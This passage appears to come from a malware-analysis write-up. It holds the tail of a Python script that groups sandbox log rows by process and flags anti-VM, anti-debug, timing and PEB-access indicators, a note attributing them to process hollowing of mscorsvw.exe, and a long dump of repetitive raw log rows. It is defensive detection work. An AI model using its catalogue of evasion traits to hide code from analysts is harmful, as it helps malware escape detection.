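        if cat is None:
            continue
        proc = process_name(source)
        per_proc[proc][cat] += 1
        if cat == "peb_access":
            m = FUNC_RE.search(detail)
            if m:
                peb_funcs[proc].add(m.group(1))   # dedupe the repeated rows per function
    return {
        proc: {
            "counts": dict(counts),
            "peb_functions": sorted(peb_funcs[proc]),
            "techniques": sorted({ATTACK[c] for c in counts}),
            "sandbox_aware": bool(SANDBOX_AWARE & set(counts)),
        }
        for proc, counts in per_proc.items()
    }


# Constructed sample: rows copied from this section, long device strings shortened.
SAMPLE_ROWS = [
    r"Source: C:\Windows\SysWOW64\ipconfig.exe TID: 4004 | Thread sleep time: -70000s >= -30000s",
    r"Source: C:\Windows\explorer.exe | Last function: Thread delayed",
    r"Source: explorer.exe, 00000003.00000000.365412810.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000",
    r"Source: explorer.exe, 00000003.00000000.360519668.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.",
    r"Source: PT300975-inv.exe, 00000000.00000002.345826499.0000000004021000.00000004.00000001.sdmp | Binary or memory string: VirtualMachineDetector",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Process queried: DebugPort",
    r"Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPort",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_00409A90 rdtsc",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0040ACD0 LdrLoadDll,",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0570C577 mov eax, dword ptr fs:[00000030h]",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0570C577 mov eax, dword ptr fs:[00000030h]",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05766DC9 mov ecx, dword ptr fs:[00000030h]",
]

if __name__ == "__main__":
    for proc, info in summarize(SAMPLE_ROWS).items():
        print(proc, info)
```

The per-process split is the point: the VM strings land on explorer.exe and the timing, DebugPort and PEB evidence on mscorsvw.exe, which is what you expect when a .NET loader hollows a signed Microsoft binary and injects into explorer.exe. The distinct-function count for `peb_access` is the number worth reporting; the raw row count mostly reflects how many times one function touches the PEB.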
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0570C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0570C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05707D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05723D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05763540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0576A537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057AE539 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05714D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05714D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05714D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057B8D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056EAD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05798DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056FD5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056FD5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057AFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057AFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057AFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057AFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05766DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05766DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05766DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05766DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05766DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05766DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05711DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05711DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05711DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057135A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057B05AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057B05AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056E2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056E2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056E2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056E2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056E2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0571FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0571FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05712581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05712581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05712581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05712581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0570746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0577C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0577C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0571A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0571BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057B740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057B740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057B740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05766C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05766C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05766C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05766C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057A14FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05766CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05766CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05766CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057B8CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056F849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056FFF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057B8F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056FEF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056E4F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056E4F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0571E730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0570F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0577FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0577FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057B070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057B070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0571A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0571A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057237F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05767794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05767794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05767794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056F8794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056F766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0570AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0570AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0570AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0570AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0570AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056F7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056F7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056F7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056F7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056F7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056F7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057AAE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057AAE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0579FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056EE620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0571A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0571A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056EC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056EC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056EC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05718E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057A1608 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056F76E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057116E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057B8ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05728EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0579FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057136CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057646A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057B0EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057B0EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057B0EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0577FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056EC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056EB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056EB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0570B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0570B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0571513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0571513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05704120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05704120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05704120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05704120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05704120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056E9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056E9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056E9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056EB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056EB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056EB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057741E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057651BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057651BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057651BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057651BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057669A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057161A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057161A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05712990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0570C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0571A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057A2073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057B1074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05700050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05700050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056FB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056FB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056FB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056FB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0571002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0571002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0571002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0571002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0571002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05767016 mov eax, dword ptr fs:[00000030h]
